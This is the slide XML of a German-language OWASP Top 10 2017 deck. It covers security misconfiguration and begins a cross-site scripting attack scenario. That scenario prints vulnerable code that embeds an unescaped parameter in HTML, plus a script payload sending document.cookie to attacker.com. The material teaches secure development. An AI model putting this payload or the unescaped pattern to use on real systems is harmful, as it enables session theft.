              </a:rPr>
              <a:t> CERT-Prozesses (siehe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Nutzung von Komponenten mit bekannten Schwachstellen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). Überprüfen Sie auch die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cloudspeicher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Rechte (z.B. S3-Bucket-Rechte).</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Eine segmentierte Anwendungsarchitektur, die eine effektive, sichere Trennung zwischen Komponenten oder Mandanten, unter Nutzung von Segmentierung, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Containerisierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> oder Cloud-Sicherheitsgruppen, gewährleistet.</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An den Client Sicherheitsdirektiven, z.B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Security Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> senden.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Ein automatisierter Prozess zum Verifizieren der Effektivität der Konfigurationen und Einstellungen in allen Umgebungen.</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A6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Sicherheitsrelevante Fehlkonfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3683841633"/>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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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1">
                        <a:solidFill>
                          <a:schemeClr val="bg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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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a:solidFill>
                          <a:schemeClr val="bg2"/>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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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baseline="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gn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Angreifer versuchen oft, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ungepatchte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Schwachstellen, Standard-Konten, ungenutzte (Beispiel-)Seiten, ungeschützte Dateien etc. auszunutzen, um einen unerlaubten Zugriff oder Informationen über das System zu erlangen. </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de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sicherheitsrelevante Fehlkonfiguration kann auf jeder Ebene der Anwendung, einschließlich der Netzwerk-dienste, Plattform, Web- und Anwendungsserver, Datenbank, Frameworks, Anwendungscode, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vorin-stallierte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> virtuelle Maschinen und Container oder Speicher vorkommen. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automatisierte Scanner können oft </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fehlkonfigura-tionen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, Standard-Konten oder -Konfigurationen, nicht benötigte Dienste, Kompatibilitäten usw. erkennen.</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de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Diese Fehler geben Angreifern häufig unautorisierten Zugriff auf System-daten oder -funktionalitäten. Manchmal führen sie zur kompletten </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Kompromittierung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> des Zielsystems. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Auswirkungen auf das Unter-nehmen hängen vom Schutzbedarf der Anwendung und ihrer Daten ab.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="de-DE" sz="9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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mögliche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angriffsszenarien</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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendung</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übernimmt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nicht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vertrauenswürdige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Daten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nicht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> auf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gültigkeit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geprüft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oder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maskiert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werden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>folgenden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> HTML-Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>zu</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generieren</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'</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value=</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("CC")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Der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Angreifer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ändert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> den Parameter ‘CC’ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>seinem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Browser auf:</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&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</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http://www.attacker.com/cgi-bin/cookie.cgi?</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foo=</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Durch</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diesen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Angriff</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wird</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> die Session-ID des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Benutzers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> an die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
